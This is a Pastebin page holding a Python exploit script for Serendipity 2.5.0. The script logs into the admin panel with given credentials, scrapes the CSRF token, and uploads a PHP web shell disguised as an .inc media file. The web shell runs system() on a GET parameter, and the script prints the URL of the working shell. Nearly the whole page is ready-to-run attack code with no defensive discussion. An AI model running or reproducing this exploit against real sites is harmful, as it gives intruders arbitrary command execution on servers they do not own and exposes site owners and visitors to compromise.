Advertisement
FlyFar

Serendipity 2.5.0 - Remote Code Execution (RCE)

Jun 8th, 2024
390
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.41 KB | Cybersecurity | 0 0
  1. # Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)
  2. # Discovered by: Ahmet Ümit BAYRAM
  3. # Discovered Date: 26.04.2024
  4. # Vendor Homepage: https://docs.s9y.org/
  5. # Software Link:https://www.s9y.org/latest
  6. # Tested Version: v2.5.0 (latest)
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import time
  11. import random
  12. import string
  13. from bs4 import BeautifulSoup
  14.  
  15. def generate_filename(extension=".inc"):
  16. return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +
  17. extension
  18.  
  19. def get_csrf_token(response):
  20. soup = BeautifulSoup(response.text, 'html.parser')
  21. token = soup.find('input', {'name': 'serendipity[token]'})
  22. return token['value'] if token else None
  23.  
  24. def login(base_url, username, password):
  25. print("Logging in...")
  26. time.sleep(2)
  27. session = requests.Session()
  28. login_page = session.get(f"{base_url}/serendipity_admin.php")
  29. token = get_csrf_token(login_page)
  30. data = {
  31. "serendipity[action]": "admin",
  32. "serendipity[user]": username,
  33. "serendipity[pass]": password,
  34. "submit": "Login",
  35. "serendipity[token]": token
  36. }
  37. headers = {
  38. "Content-Type": "application/x-www-form-urlencoded",
  39. "Referer": f"{base_url}/serendipity_admin.php"
  40. }
  41. response = session.post(f"{base_url}/serendipity_admin.php", data=data,
  42. headers=headers)
  43. if "Add media" in response.text:
  44. print("Login Successful!")
  45. time.sleep(2)
  46. return session
  47. else:
  48. print("Login Failed!")
  49. return None
  50.  
  51. def upload_file(session, base_url, filename, token):
  52. print("Shell Preparing...")
  53. time.sleep(2)
  54. boundary = "---------------------------395233558031804950903737832368"
  55. headers = {
  56. "Content-Type": f"multipart/form-data; boundary={boundary}",
  57. "Referer": f"{base_url}
  58. /serendipity_admin.php?serendipity[adminModule]=media"
  59. }
  60. payload = (
  61. f"--{boundary}\r\n"
  62. f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"
  63. f"{token}\r\n"
  64. f"--{boundary}\r\n"
  65. f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"
  66. f"admin\r\n"
  67. f"--{boundary}\r\n"
  68. f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"
  69. f"media\r\n"
  70. f"--{boundary}\r\n"
  71. f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"
  72. f"add\r\n"
  73. f"--{boundary}\r\n"
  74. f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";
  75. filename=\"{filename}\"\r\n"
  76. f"Content-Type: text/html\r\n\r\n"
  77. "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo
  78. basename($_SERVER['PHP_SELF']); ?>\">\n"
  79. "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input
  80. type=\"SUBMIT\" value=\"Execute\">\n"
  81. "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}
  82. \n?>\n</pre>\n</body>\n</html>\r\n"
  83. f"--{boundary}--\r\n"
  84. )
  85.  
  86. response = session.post(f"{base_url}
  87. /serendipity_admin.php?serendipity[adminModule]=media", headers=headers,
  88. data=payload.encode('utf-8'))
  89. if f"File {filename} successfully uploaded as" in response.text:
  90. print(f"Your shell is ready: {base_url}/uploads/{filename}")
  91. else:
  92. print("Exploit Failed!")
  93.  
  94. def main(base_url, username, password):
  95. filename = generate_filename()
  96. session = login(base_url, username, password)
  97. if session:
  98. token = get_csrf_token(session.get(f"{base_url}
  99. /serendipity_admin.php?serendipity[adminModule]=media"))
  100. upload_file(session, base_url, filename, token)
  101.  
  102. if __name__ == "__main__":
  103. import sys
  104. if len(sys.argv) != 4:
  105. print("Usage: python script.py <siteurl> <username> <password>")
  106. else:
  107. main(sys.argv[1], sys.argv[2], sys.argv[3])
  108.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement